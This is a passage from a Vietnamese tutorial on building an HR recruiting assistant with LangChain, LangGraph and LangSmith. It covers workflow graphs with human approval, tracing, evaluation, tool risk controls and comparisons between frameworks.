builder.add_node("draft_email", generate_email_draft_fn)
builder.add_node("send_email", send_email_fn)
builder.add_node("update_status", update_pipeline_fn)

def wait_hr_approval(state: HRCopilotState):
    decision = interrupt({"email_draft": state["email_draft"]})
    return {"hr_approval_status": decision}

builder.add_node("wait_hr_approval", wait_hr_approval)

builder.add_edge(START, "load_jd")
builder.add_edge("load_jd", "search")
builder.add_edge("search", "score")
builder.add_edge("score", "rank")

def route_after_rank(state: HRCopilotState):
    return "draft_email" if state["top_candidates"] else END

builder.add_conditional_edges("rank", route_after_rank, {
    "draft_email": "draft_email",
    END: END,
})

builder.add_edge("draft_email", "wait_hr_approval")

def route_after_approval(state: HRCopilotState):
    return {
        "approved": "send_email",
        "revise": "draft_email",
        "rejected": END,
    }[state["hr_approval_status"]]

builder.add_conditional_edges("wait_hr_approval", route_after_approval, {
    "send_email": "send_email",
    "draft_email": "draft_email",
    END: END,
})

builder.add_edge("send_email", "update_status")
builder.add_edge("update_status", END)

graph = builder.compile(checkpointer=MemorySaver())
</code></pre>
<p></p>
<h5 id="48khinonndnglanggraph">4.8 Khi nào nên dùng LangGraph?</h5>
<p>Dùng LangGraph khi bạn thấy các dấu hiệu này:</p>
<table>
<thead>
<tr>
<th>Dấu hiệu</th>
<th>Ví dụ</th>
</tr>
</thead>
<tbody>
<tr>
<td>Workflow nhiều bước</td>
<td>Search → score → rank → draft → approve → send</td>
</tr>
<tr>
<td>Có nhánh điều kiện</td>
<td>Nếu thiếu thông tin thì hỏi lại HR</td>
</tr>
<tr>
<td>Có vòng lặp</td>
<td>HR yêu cầu sửa email nhiều lần</td>
</tr>
<tr>
<td>Có state cần giữ</td>
<td>JD, CV, score, email draft</td>
</tr>
<tr>
<td>Có human approval</td>
<td>Trước khi gửi email hoặc update ATS</td>
</tr>
<tr>
<td>Cần resume</td>
<td>HR duyệt sau vài giờ hoặc vài ngày</td>
</tr>
<tr>
<td>Cần kiểm soát agent</td>
<td>Không để LLM tự quyết mọi thứ trong prompt</td>
</tr>
</tbody>
</table>
<p>Nếu task chỉ là <code>prompt | model | parser</code>, dùng LangGraph có thể hơi thừa. Nhưng nếu task là một quy trình nghiệp vụ thật, LangGraph rất đáng dùng.</p>
<hr>
<h4 id="5langsmithnhnthyagentlmg">5. LangSmith: nhìn thấy agent đã làm gì</h4>
<p>Một vấn đề lớn của AI app là: khi nó trả lời sai, ta thường không biết sai ở đâu.</p>
<p>Ví dụ HR hỏi:</p>
<pre><code class="language-text">Vì sao AI lại chọn ứng viên A thay vì ứng viên B?
</code></pre>
<p>Nếu không có trace, bạn chỉ thấy kết quả cuối cùng. Bạn không biết:</p>
<ul>
<li>AI đã đọc đúng JD chưa,</li>
<li>đã tìm đúng CV chưa,</li>
<li>tool search có trả thiếu dữ liệu không,</li>
<li>prompt chấm điểm có thiếu tiêu chí không,</li>
<li>model có tự suy diễn quá đà không,</li>
<li>chi phí request đó là bao nhiêu,</li>
<li>bước nào chạy chậm nhất.</li>
</ul>
<p>LangSmith giúp ghi lại toàn bộ hành trình đó.</p>
<pre><code class="language-text">User request
→ load_job_description
→ search_candidates
→ read_candidate_cv
→ score_candidate
→ generate_email_draft
→ wait_hr_approval
</code></pre>
<p>LangSmith không trực tiếp làm agent thông minh hơn. Nhưng nó giúp team <strong>nhìn thấy, debug, đánh giá và cải thiện agent theo thời gian</strong>.</p>
<h5 id="51tracecameraquaylitonbrequest">5.1 Trace: camera quay lại toàn bộ request</h5>
<p>Trace cho thấy từng bước agent đã đi qua:</p>
<pre><code class="language-text">Request input
  → load_job_description(job_id="GO-BE-2026")
  → search_candidates(skills=["Go", "MySQL", "AWS"])
  → read_candidate_cv(C001)
  → score_candidate(C001)
  → read_candidate_cv(C002)
  → score_candidate(C002)
  → rank_candidates
  → generate_summary
  → final_answer
</code></pre>
<p>Nếu kết quả sai, bạn có thể mở trace và kiểm tra:</p>
<table>
<thead>
<tr>
<th>Câu hỏi debug</th>
<th>Có thể phát hiện</th>
</tr>
</thead>
<tbody>
<tr>
<td>Agent gọi đúng tool chưa?</td>
<td>Gọi nhầm <code>search_old_candidates</code> thay vì <code>search_candidates</code></td>
</tr>
<tr>
<td>Tool trả dữ liệu đúng chưa?</td>
<td>CV thiếu phần kinh nghiệm gần nhất</td>
</tr>
<tr>
<td>RAG lấy đúng tài liệu chưa?</td>
<td>Lấy nhầm JD Java thay vì JD Go</td>
</tr>
<tr>
<td>LLM chấm điểm có hợp lý không?</td>
<td>Ưu tiên sai tiêu chí</td>
</tr>
<tr>
<td>Bước nào chậm?</td>
<td>Vector search mất 4 giây</td>
</tr>
<tr>
<td>Request nào tốn token?</td>
<td>Prompt chứa quá nhiều CV không cần thiết</td>
</tr>
</tbody>
</table>
<h5 id="52evaluationngnhgiaibngcmgic">5.2 Evaluation: đừng đánh giá AI bằng cảm giác</h5>
<p>Khi build AI app, rất dễ nói:</p>
<pre><code class="language-text">Mình test thấy cũng ổn.
</code></pre>
<p>Nhưng “thấy ổn” không đủ cho production.</p>
<p>Bạn cần dataset test:</p>
<table>
<thead>
<tr>
<th>Input</th>
<th>Expected behavior</th>
</tr>
</thead>
<tbody>
<tr>
<td>“Đánh giá CV A cho JD Senior Go”</td>
<td>Trả score, strengths, risks, recommendation</td>
</tr>
<tr>
<td>“Gửi email reject ứng viên B”</td>
<td>Không gửi ngay, phải yêu cầu HR xác nhận</td>
</tr>
<tr>
<td>“Tìm ứng viên Java nhưng JD là Go”</td>
<td>Cảnh báo mismatch</td>
</tr>
<tr>
<td>“Ứng viên thiếu salary expectation”</td>
<td>Đánh dấu missing information</td>
</tr>
<tr>
<td>“Soạn email offer”</td>
<td>Dùng template chính thức và chờ approval</td>
</tr>
</tbody>
</table>
<p>LangSmith giúp chạy evaluation trên dataset đó để xem agent có bị hồi quy sau mỗi lần đổi prompt, đổi model, đổi retriever không.</p>
<p>Các kiểu evaluator thường gặp:</p>
<table>
<thead>
<tr>
<th>Evaluator</th>
<th>Dùng khi nào</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Human</strong></td>
<td>Cần HR / expert chấm tay</td>
</tr>
<tr>
<td><strong>Code</strong></td>
<td>Có rule rõ ràng, ví dụ output phải có field <code>match_score</code></td>
</tr>
<tr>
<td><strong>LLM-as-judge</strong></td>
<td>Muốn LLM khác chấm độ hợp lý của câu trả lời</td>
</tr>
<tr>
<td><strong>Pairwise</strong></td>
<td>So sánh output của prompt A và prompt B</td>
</tr>
</tbody>
</table>
<h5 id="53monitoringkhiagentchytht">5.3 Monitoring: khi agent chạy thật</h5>
<p>Khi đưa HR Copilot vào production, bạn cần theo dõi:</p>
<ul>
<li>latency,</li>
<li>token usage,</li>
<li>cost,</li>
<li>error rate,</li>
<li>tool failure,</li>
<li>retrieval quality,</li>
<li>feedback của HR,</li>
<li>prompt version,</li>
<li>model version,</li>
<li>đường đi của agent trong graph.</li>
</ul>
<p>Không có monitoring, team chỉ nghe được câu: “AI trả lời sai”. Có monitoring, team biết sai ở đâu và sửa đúng chỗ.</p>
<p></p>
<h5 id="54langsmithkhngchdngcholangchain">5.4 LangSmith không chỉ dùng cho LangChain</h5>
<p>Một điểm đáng chú ý: LangSmith không bắt buộc app của bạn phải viết bằng LangChain.</p>
<p>Bạn có thể dùng LangSmith để quan sát app viết bằng nhiều framework hoặc SDK khác, nhờ nó hỗ trợ chuẩn tracing / observability như OpenTelemetry.</p>
<p>Nói đơn giản: LangSmith là lớp quan sát cho AI app, không phải chỉ là “log viewer của LangChain”.</p>
<hr>
<h3 id="phniicasestudybuildhrcopilot">PHẦN II — CASE STUDY: BUILD HR COPILOT</h3>
<hr>
<h4 id="6hrcopilotcnlmg">6. HR Copilot cần làm gì?</h4>
<p>Hãy tưởng tượng công ty muốn build một tool nội bộ tên <strong>HR Copilot</strong>.</p>
<p>HR nhập:</p>
<pre><code class="language-text">Tìm giúp tôi ứng viên phù hợp cho vị trí Senior Backend Go Developer,
ưu tiên có AWS, MySQL, tiếng Nhật N2. Nếu phù hợp thì soạn email mời phỏng vấn.
</code></pre>
<p>Tool cần chạy như sau:</p>
<pre><code class="language-text">Hiểu yêu cầu
→ Lấy JD
→ Tìm ứng viên
→ Đọc CV và note cũ
→ Chấm điểm
→ Xếp hạng
→ Giải thích lý do chọn
→ Soạn email
→ Chờ HR duyệt
→ Gửi email
→ Cập nhật pipeline
→ Ghi trace
</code></pre>
<p>Đây là một ví dụ rất tốt để thấy vì sao cần cả ba công cụ:</p>
<table>
<thead>
<tr>
<th>Lớp</th>
<th>Làm gì trong HR Copilot</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangChain</strong></td>
<td>prompt, model, structured output, tool calling, RAG</td>
</tr>
<tr>
<td><strong>LangGraph</strong></td>
<td>workflow nhiều bước, state, nhánh, approval, resume</td>
</tr>
<tr>
<td><strong>LangSmith</strong></td>
<td>trace, debug, evaluation, monitoring</td>
</tr>
</tbody>
</table>
<hr>
<h4 id="7kintrctngth">7. Kiến trúc tổng thể</h4>
<pre><code class="language-text">HR User
  → Web App / Slack Bot / Internal Tool
  → Backend API
  → AI Layer
       ├── LangChain
       │     ├── Model
       │     ├── Prompt
       │     ├── Tool calling
       │     ├── Retriever / RAG
       │     └── Structured output
       │
       ├── LangGraph
       │     ├── State
       │     ├── Nodes
       │     ├── Edges
       │     ├── Conditional routing
       │     ├── Human approval
       │     └── Checkpoint
       │
       └── LangSmith
             ├── Trace
             ├── Evaluation
             ├── Monitoring
             └── Cost / latency tracking

  → Business Systems
       ├── Candidate DB
       ├── CV storage
       ├── JD database
       ├── Gmail / SMTP
       ├── Google Calendar
       ├── Slack
       └── ATS / Google Sheet
</code></pre>
<hr>
<h4 id="8datamodelngin">8. Data model đơn giản</h4>
<p>Để demo, ta có thể bắt đầu với ba nhóm dữ liệu:</p>
<pre><code class="language-text">Candidate
  - id
  - name
  - email
  - skills
  - language_level
  - years_of_experience
  - current_status
  - cv_url
  - notes

JobDescription
  - id
  - title
  - required_skills
  - nice_to_have_skills
  - language_requirement
  - level
  - salary_range

PipelineStatus
  - candidate_id
  - job_id
  - status
  - last_contacted_at
  - interviewer
  - next_action
</code></pre>
<p>Đừng thiết kế quá phức tạp từ đầu. Prototype chỉ cần đủ dữ liệu để chứng minh workflow chạy được.</p>
<hr>
<h4 id="9toollistchohrcopilot">9. Tool list cho HR Copilot</h4>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Input</th>
<th>Output</th>
<th>Mục đích</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>get_job_description</code></td>
<td>job_id / keyword</td>
<td>JD detail</td>
<td>Lấy thông tin vị trí</td>
</tr>
<tr>
<td><code>search_candidates</code></td>
<td>skills, level, language</td>
<td>Candidate list</td>
<td>Tìm ứng viên</td>
</tr>
<tr>
<td><code>get_candidate_cv</code></td>
<td>candidate_id</td>
<td>CV text</td>
<td>Đọc CV</td>
</tr>
<tr>
<td><code>get_candidate_notes</code></td>
<td>candidate_id</td>
<td>Notes/history</td>
<td>Biết lịch sử liên hệ</td>
</tr>
<tr>
<td><code>score_candidate</code></td>
<td>CV + JD</td>
<td>Score JSON</td>
<td>Chấm điểm</td>
</tr>
<tr>
<td><code>generate_email_draft</code></td>
<td>candidate + JD</td>
<td>Email draft</td>
<td>Soạn email</td>
</tr>
<tr>
<td><code>request_hr_approval</code></td>
<td>draft + candidate</td>
<td>approval result</td>
<td>Chờ HR duyệt</td>
</tr>
<tr>
<td><code>send_email</code></td>
<td>to, subject, body</td>
<td>send result</td>
<td>Gửi email</td>
</tr>
<tr>
<td><code>update_pipeline_status</code></td>
<td>candidate_id, status</td>
<td>update result</td>
<td>Cập nhật ATS</td>
</tr>
<tr>
<td><code>post_slack_summary</code></td>
<td>channel, message</td>
<td>post result</td>
<td>Báo cáo cho team</td>
</tr>
</tbody>
</table>
<p>Nguyên tắc quan trọng: không phải tool nào agent cũng được gọi tự do.</p>
<table>
<thead>
<tr>
<th>Tool</th>
<th>Rủi ro</th>
<th>Nên kiểm soát thế nào</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>search_candidates</code></td>
<td>Thấp</td>
<td>Cho phép</td>
</tr>
<tr>
<td><code>get_candidate_cv</code></td>
<td>Trung bình</td>
<td>Log access</td>
</tr>
<tr>
<td><code>send_email</code></td>
<td>Cao</td>
<td>Cần HR approval</td>
</tr>
<tr>
<td><code>update_pipeline_status</code></td>
<td>Cao</td>
<td>Cần approval hoặc role permission</td>
</tr>
<tr>
<td><code>send_offer_letter</code></td>
<td>Rất cao</td>
<td>Bắt buộc human approval</td>
</tr>
</tbody>
</table>
<hr>
<h4 id="10mockuplungsdng">10. Mockup luồng sử dụng</h4>
<h3 id="mn1hrnhpyucu">Màn 1 — HR nhập yêu cầu</h3>
<pre><code class="language-text">┌─ HR Copilot ───────────────────────────────────────────────┐
│                                                            │
│  HR ▸ Tìm ứng viên cho Senior Backend Go Developer,        │
│       ưu tiên AWS / MySQL / tiếng Nhật N2. Nếu hợp thì      │
│       soạn email mời phỏng vấn.                      [Gửi]  │
│                                                            │
│  ⏳ Agent đang chạy…                                        │
│     ✓ Đã lấy JD: Senior Backend Go Developer               │
│     ✓ Tìm thấy 3 ứng viên                                  │
│     ✓ Chấm điểm xong                                       │
│     ✓ 1 ứng viên đạt ngưỡng                                │
│     ⏸ Đã soạn email — đang chờ bạn duyệt                   │
│                                                            │
└────────────────────────────────────────────────────────────┘
</code></pre>
<h5 id="mn2bngngvinchmim">Màn 2 — Bảng ứng viên đã chấm điểm</h5>
<pre><code class="language-text">┌─ Kết quả: Senior Backend Go Developer ─────────────────────┐
│                                                            │
│  #  Ứng viên        Điểm  Đề xuất        Điểm mạnh         │
│  ─  ─────────────   ────  ───────────    ───────────────   │
│  1  Nguyen Van A     92★  Mời PV         Go, MySQL, AWS    │
│  2  Tran Thi B       64   Tạm giữ        Go, MySQL         │
│  3  Le Van C         58   Tạm giữ        AWS               │
│                                                            │
│  ▸ Vì sao chọn #1?                                         │
│    Khớp 3/3 kỹ năng bắt buộc + N2 + 5 năm kinh nghiệm.     │
│    Rủi ro: chưa rõ kinh nghiệm quản lý team.               │
│                                                            │
│            [ Xem CV đầy đủ ]   [ Soạn email cho #1 ]       │
└────────────────────────────────────────────────────────────┘
</code></pre>
<h5 id="mn3hrduytemailtrckhigi">Màn 3 — HR duyệt email trước khi gửi</h5>
<pre><code class="language-text">┌─ Duyệt email trước khi gửi ────────────────────────────────┐
│  Tới: a@example.com                                        │
│  Tiêu đề: Invitation to interview - Senior Backend Go Dev  │
│  ────────────────────────────────────────────────────────  │
│  Hi Nguyen Van A,                                          │
│  Cảm ơn anh đã quan tâm vị trí Senior Backend Go Developer │
│  … nội dung do agent soạn …                                │
│  Best regards, HR Team                                     │
│  ────────────────────────────────────────────────────────  │
│     [ ✓ Duyệt & Gửi ]   [ ✎ Sửa lại ]   [ ✗ Hủy ]          │
└────────────────────────────────────────────────────────────┘
</code></pre>
<p>Ba nút này ánh xạ trực tiếp vào ba nhánh trong LangGraph:</p>
<pre><code class="language-text">approved → send_email → update_pipeline_status
revise   → revise_email → wait_hr_approval
rejected → END
</code></pre>
<hr>
<h4 id="11ltrnhbuildprototype">11. Lộ trình build prototype</h4>
<p>Không nên build full HR Copilot ngay từ đầu. Nên đi từng version nhỏ.</p>
<table>
<thead>
<tr>
<th>Version</th>
<th>Mục tiêu</th>
<th>LangChain</th>
<th>LangGraph</th>
<th>LangSmith</th>
</tr>
</thead>
<tbody>
<tr>
<td>V1 — CV summarizer</td>
<td>Upload CV → JSON tóm tắt</td>
<td>model + prompt + structured output</td>
<td>Chưa cần</td>
<td>Bật trace</td>
</tr>
<tr>
<td>V2 — CV-JD matcher</td>
<td>CV + JD → score + strengths + risks</td>
<td>prompt + parser + model</td>
<td>Chưa cần</td>
<td>Eval dataset</td>
</tr>
<tr>
<td>V3 — Candidate search</td>
<td>Yêu cầu → search DB → top candidates</td>
<td>tool calling</td>
<td>Bắt đầu nếu nhiều bước</td>
<td>Trace tool calls</td>
</tr>
<tr>
<td>V4 — Interview email</td>
<td>Soạn email → HR duyệt → gửi</td>
<td>generate draft</td>
<td>Approval workflow</td>
<td>Trace + monitor</td>
</tr>
<tr>
<td>V5 — Full HR Copilot</td>
<td>Search → Evaluate → Recommend → Draft → Approve → Send → Update → Report</td>
<td>components</td>
<td>full orchestration</td>
<td>observability + eval</td>
</tr>
</tbody>
</table>
<p>Cách này giúp team có kết quả sớm, giảm rủi ro và dễ đo chất lượng.</p>
<hr>
<h4 id="12tdemotiproductioncnthayg">12. Từ demo tới production: cần thay gì?</h4>
<p>Một demo HR Copilot có thể dùng dữ liệu in-memory và fake email. Nhưng để chạy thật, cần thay dần từng phần.</p>
<table>
<thead>
<tr>
<th>Mảng</th>
<th>Demo</th>
<th>Production</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Dữ liệu</strong></td>
<td>List / JSON in-memory</td>
<td>Postgres, MySQL, ATS, Google Sheet</td>
</tr>
<tr>
<td><strong>CV storage</strong></td>
<td>Text mẫu</td>
<td>S3, Google Drive, internal file storage</td>
</tr>
<tr>
<td><strong>Tìm ứng viên</strong></td>
<td>Lọc list bằng keyword</td>
<td>DB query + vector search</td>
</tr>
<tr>
<td><strong>Chấm điểm</strong></td>
<td>Rule đơn giản</td>
<td>LLM + structured output + evaluation</td>
</tr>
<tr>
<td><strong>Gửi email</strong></td>
<td>Print / fake list</td>
<td>Gmail API / SMTP</td>
</tr>
<tr>
<td><strong>Cập nhật ATS</strong></td>
<td>Fake update</td>
<td>API ATS / Google Sheet</td>
</tr>
<tr>
<td><strong>Checkpointer</strong></td>
<td>MemorySaver</td>
<td>SQLite / Postgres checkpointer</td>
</tr>
<tr>
<td><strong>Giao diện</strong></td>
<td>Console</td>
<td>Web app / Slack bot</td>
</tr>
<tr>
<td><strong>Quan sát</strong></td>
<td>print log</td>
<td>LangSmith trace</td>
</tr>
<tr>
<td><strong>Phân quyền</strong></td>
<td>Chưa có</td>
<td>Auth + role-based permission</td>
</tr>
</tbody>
</table>
<p>Nói ngắn gọn:</p>
<pre><code class="language-text">Prototype: chứng minh workflow đúng.
Production: thay mock bằng hệ thống thật, thêm permission, trace, eval, monitoring.
</code></pre>
<hr>
<h3 id="phniiisosnhvkhinodngcino">PHẦN III — SO SÁNH VÀ KHI NÀO DÙNG CÁI NÀO</h3>
<hr>
<h4 id="13chainagentvgraphkhcnhauu">13. Chain, Agent và Graph khác nhau ở đâu?</h4>
<table>
<thead>
<tr>
<th>Khái niệm</th>
<th>Hiểu đơn giản</th>
<th>Khi nào dùng</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Chain</strong></td>
<td>Pipeline thẳng</td>
<td>Prompt → Model → Parser</td>
</tr>
<tr>
<td><strong>Agent</strong></td>
<td>LLM tự quyết gọi tool nào</td>
<td>Cần tool calling linh hoạt</td>
</tr>
<tr>
<td><strong>Graph</strong></td>
<td>Workflow có state, node, edge, nhánh</td>
<td>Nhiều bước, approval, resume</td>
</tr>
</tbody>
</table>
<p>Ví dụ HR:</p>
<pre><code class="language-text">Chain:
CV + JD → LLM → Score JSON

Agent:
HR hỏi → agent tự quyết cần search JD, tìm CV, đọc note

Graph:
Search → Score → Rank → Draft Email → Wait Approval → Send → Update ATS
</code></pre>
<hr>
<h4 id="14sosnhlangchainlanggraphlangsmith">14. So sánh LangChain, LangGraph, LangSmith</h4>
<table>
<thead>
<tr>
<th>Tiêu chí</th>
<th>LangChain</th>
<th>LangGraph</th>
<th>LangSmith</th>
</tr>
</thead>
<tbody>
<tr>
<td>Vai trò</td>
<td>Dựng app/agent từ component</td>
<td>Điều phối workflow agent có state</td>
<td>Quan sát, debug, đánh giá</td>
</tr>
<tr>
<td>Trừu tượng chính</td>
<td>Prompt, model, tool, retriever, parser, Runnable</td>
<td>Node, Edge, State, Checkpoint</td>
<td>Trace, Dataset, Evaluator, Metrics</td>
</tr>
<tr>
<td>Câu hỏi nó trả lời</td>
<td>“Dùng model/tool/data thế nào?”</td>
<td>“Agent đi qua bước nào?”</td>
<td>“Agent đã làm gì, sai ở đâu?”</td>
</tr>
<tr>
<td>App đơn giản</td>
<td>Rất hợp</td>
<td>Hơi thừa</td>
<td>Hữu ích nếu muốn trace</td>
</tr>
<tr>
<td>Workflow phức tạp</td>
<td>Một mình chưa đủ</td>
<td>Rất hợp</td>
<td>Rất cần</td>
</tr>
<tr>
<td>Human approval</td>
<td>Tự xử lý thêm</td>
<td>Hỗ trợ tốt</td>
<td>Quan sát được</td>
</tr>
<tr>
<td>Evaluation</td>
<td>Không phải trọng tâm</td>
<td>Không phải trọng tâm</td>
<td>Trọng tâm</td>
</tr>
<tr>
<td>Monitoring production</td>
<td>Không phải trọng tâm</td>
<td>Không phải trọng tâm</td>
<td>Trọng tâm</td>
</tr>
</tbody>
</table>
<hr>
<h4 id="15khinodngg">15. Khi nào dùng gì?</h4>
<h5 id="chdngllmapitrctip">Chỉ dùng LLM API trực tiếp</h5>
<p>Dùng khi:</p>
<ul>
<li>task rất nhỏ,</li>
<li>không cần tool,</li>
<li>không cần RAG,</li>
<li>không cần structured output phức tạp,</li>
<li>không cần trace sâu.</li>
</ul>
<p>Ví dụ:</p>
<pre><code class="language-text">Dịch email từ tiếng Nhật sang tiếng Việt.
</code></pre>
<h5 id="dnglangchain">Dùng LangChain</h5>
<p>Dùng khi:</p>
<ul>
<li>cần prompt template,</li>
<li>cần structured output,</li>
<li>cần tool calling,</li>
<li>cần RAG,</li>
<li>cần pipeline rõ ràng.</li>
</ul>
<p>Ví dụ:</p>
<pre><code class="language-text">CV + JD → score JSON
</code></pre>
<h5 id="dnglanggraph">Dùng LangGraph</h5>
<p>Dùng khi:</p>
<ul>
<li>workflow nhiều bước,</li>
<li>có nhánh,</li>
<li>có state,</li>
<li>có human approval,</li>
<li>cần resume,</li>
<li>cần kiểm soát flow thay vì để prompt tự lo.</li>
</ul>
<p>Ví dụ:</p>
<pre><code class="language-text">Tìm CV → chấm điểm → soạn email → HR duyệt → gửi email → update ATS
</code></pre>
<h5 id="dnglangsmith">Dùng LangSmith</h5>
<p>Dùng khi:</p>
<ul>
<li>muốn debug,</li>
<li>muốn evaluation,</li>
<li>muốn monitor cost/latency,</li>
<li>muốn quan sát production,</li>
<li>muốn biết agent sai ở đâu.</li>
</ul>
<p>Ví dụ:</p>
<pre><code class="language-text">HR phản ánh AI chọn ứng viên sai → mở trace xem lỗi ở tool, prompt, RAG hay model.
</code></pre>
<hr>
<h4 id="16tlangchainlanggraphgiarngframework">16. Đặt LangChain / LangGraph giữa rừng framework</h4>
<p>Ngoài bộ ba này còn nhiều framework khác. Mỗi framework có triết lý riêng.</p>
<table>
<thead>
<tr>
<th>Framework</th>
<th>Triết lý chính</th>
<th>Hợp với</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>LangGraph</strong></td>
<td>Graph / máy trạng thái</td>
<td>Workflow nhiều bước, state, approval</td>
</tr>
<tr>
<td><strong>LlamaIndex</strong></td>
<td>Dữ liệu và RAG</td>
<td>App hỏi đáp trên kho tài liệu lớn</td>
</tr>
<tr>
<td><strong>Microsoft AutoGen</strong></td>
<td>Multi-agent conversation</td>
<td>Nhiều agent trò chuyện / phối hợp</td>
</tr>
<tr>
<td><strong>CrewAI</strong></td>
<td>Vai trò và team agent</td>
<td>Mô phỏng team: researcher, writer, reviewer</td>
</tr>
<tr>
<td><strong>DSPy</strong></td>
<td>Khai báo và tối ưu prompt</td>
<td>Tự động tối ưu pipeline/prompt</td>
</tr>
<tr>
<td><strong>Haystack</strong></td>
<td>NLP/search pipeline</td>
<td>Search, RAG production theo pipeline</td>
</tr>
</tbody>
</table>
<p>La bàn chọn nhanh:</p>
<ul>
<li>Nặng về <strong>workflow có kiểm soát</strong> → LangGraph.</li>
<li>Nặng về <strong>RAG / data retrieval</strong> → LlamaIndex hoặc LangChain retriever.</li>
<li>Nặng về <strong>multi-agent hội thoại</strong> → AutoGen.</li>
<li>Muốn diễn đạt theo <strong>vai trò trong team</strong> → CrewAI.</li>
<li>Muốn <strong>tối ưu prompt tự động</strong> → DSPy.</li>
</ul>
<p>Ghi chú: phần này chỉ nên xem như bản đồ định hướng. Khi chọn công nghệ cho production, vẫn nên kiểm tra tài liệu chính thức và thử prototype nhỏ.</p>
<hr>
<h3 id="phnivdeepdivengnchodeveloper">PHẦN IV — DEEP DIVE NGẮN CHO DEVELOPER</h3>
<p>Phần này dành cho người muốn hiểu sâu hơn. Nếu bạn chỉ cần build prototype, có thể đọc lướt.</p>
<hr>
<h4 id="17reactvnglpvanghvalm">17. ReAct: vòng lặp vừa nghĩ vừa làm</h4>
<p>ReAct là một ý tưởng nền tảng của nhiều agent hiện đại.</p>
<p>Thay vì để model trả lời một lần, agent chạy theo vòng:</p>
<pre><code class="language-text">Reason → Act → Observe → Reason again
</code></pre>
<p>Trong HR Copilot:</p>
<pre><code class="language-text">Reason: Cần tìm ứng viên có Go, AWS, MySQL.
Act: gọi search_candidates().
Observe: có 12 ứng viên.
Reason: cần loại người thiếu tiếng Nhật N2.
Act: gọi filter_candidates().
Observe: còn 3 ứng viên.
Reason: chấm điểm và chọn người tốt nhất.
</code></pre>
<p>LangChain giúp implement tool calling. LangGraph giúp biến vòng lặp này thành workflow có kiểm soát.</p>
<hr>
<h4 id="18reflexionagentbitrtkinhnghim">18. Reflexion: agent biết rút kinh nghiệm</h4>
<p>Reflexion là ý tưởng agent có thể tự ghi lại bài học sau mỗi lần chạy.</p>
<p>Ví dụ sau một lần chọn sai ứng viên, agent có thể lưu note:</p>
<pre><code class="language-text">Lần sau không nên chỉ dựa vào keyword AWS trong CV.
Cần kiểm tra xem ứng viên có kinh nghiệm production thật hay chỉ liệt kê skill.
</code></pre>
<p>Trong thực tế, phần “trí nhớ” này có thể được hiện thực bằng state, memory, checkpoint hoặc storage riêng.</p>
<p>LangGraph không tự biến agent thành “biết học” theo nghĩa huấn luyện lại model. Nhưng nó cung cấp hạ tầng state/checkpoint để lưu và dùng lại thông tin giữa các lượt chạy.</p>
<hr>
<h4 id="19langchainrunnablevlcel">19. LangChain Runnable và LCEL</h4>
<p>Nếu đi sâu vào LangChain, khái niệm quan trọng là <code>Runnable</code>.</p>
<p>Hiểu đơn giản, <code>Runnable</code> là giao diện chung cho các mảnh ghép có thể chạy được:</p>
<ul>
<li>prompt,</li>
<li>model,</li>
<li>parser,</li>
<li>retriever,</li>
<li>tool,</li>
<li>function tự viết.</li>
</ul>
<p>Các runnable thường có những cách gọi giống nhau:</p>
<table>
<thead>
<tr>
<th>Method</th>
<th>Ý nghĩa</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>invoke</code> / <code>ainvoke</code></td>
<td>Chạy một input</td>
</tr>
<tr>
<td><code>batch</code> / <code>abatch</code></td>
<td>Chạy nhiều input</td>
</tr>
<tr>
<td><code>stream</code> / <code>astream</code></td>
<td>Stream kết quả</td>
</tr>
</tbody>
</table>
<p>LCEL cho phép nối runnable bằng dấu <code>|</code>:</p>
<pre><code class="language-python">chain = prompt | model | output_parser
</code></pre>
<p>Nói dễ hiểu: LangChain cố gắng làm cho các mảnh ghép AI có chung một “đầu nối”, để việc ghép pipeline gọn như xếp Lego.</p>
<hr>
<h4 id="20langgraphpregelvsuperstep">20. LangGraph, Pregel và super-step</h4>
<p>LangGraph lấy cảm hứng từ mô hình xử lý graph như Pregel / BSP.</p>
<p>Hình dung đơn giản, graph chạy theo từng “đợt”:</p>
<pre><code class="language-text">1. Xem node nào cần chạy
2. Chạy các node đó
3. Gộp kết quả vào state
4. Chuyển sang đợt tiếp theo
</code></pre>
<p>Cách chạy này giúp workflow có tính rõ ràng:</p>
<ul>
<li>node nào chạy,</li>
<li>state được cập nhật lúc nào,</li>
<li>checkpoint lưu ở đâu,</li>
<li>khi resume thì quay lại mốc nào.</li>
</ul>
<p>Với production, cần lưu ý: durable execution phụ thuộc vào checkpointer và cách triển khai hạ tầng. Prototype có thể dùng <code>MemorySaver</code>, nhưng production nên dùng storage bền hơn như SQLite/Postgres checkpointer.</p>
<hr>
<h4 id="21langsmithvopentelemetry">21. LangSmith và OpenTelemetry</h4>
<p>LangSmith có thể nhận trace từ nhiều app/framework khác nhau. Một lý do là nó hỗ trợ hướng tiếp cận observability dựa trên chuẩn như OpenTelemetry.</p>
<p>Ý nghĩa thực tế:</p>
<pre><code class="language-text">Bạn không bị bắt buộc phải viết app bằng LangChain mới dùng được LangSmith.
</code></pre>
<p>Nếu team đã có Datadog, Grafana hoặc hệ thống observability riêng, LangSmith có thể là lớp chuyên biệt cho AI trace/eval, còn hệ thống hiện tại tiếp tục dùng cho infra/app metrics.</p>
<hr>
<h3 id="phnvlithnggpvktlun">PHẦN V — LỖI THƯỜNG GẶP VÀ KẾT LUẬN</h3>
<hr>
<h4 id="22nmlithnggpkhibuildhraitool">22. Năm lỗi thường gặp khi build HR AI tool</h4>
<h5 id="li1chollmquytnhqunhiu">Lỗi 1: Cho LLM quyết định quá nhiều</h5>
<p>Không nên để LLM tự reject ứng viên hoặc tự gửi email.</p>
<p>Nên làm:</p>
<pre><code class="language-text">AI đề xuất → HR duyệt → hệ thống hành động
</code></pre>
<h5 id="li2khngdngstructuredoutput">Lỗi 2: Không dùng structured output</h5>
<p>Text tự do dễ đọc nhưng khó xử lý bằng backend.</p>
<p>Nên dùng JSON/schema cho những kết quả quan trọng:</p>
<pre><code class="language-json">{
  "match_score": 82,
  "recommendation": "move_to_interview",
  "risks": ["Thiếu leadership experience"]
}
</code></pre>
<h5 id="li3khngctrace">Lỗi 3: Không có trace</h5>
<p>Khi AI sai, không có trace thì gần như chỉ đoán mò.</p>
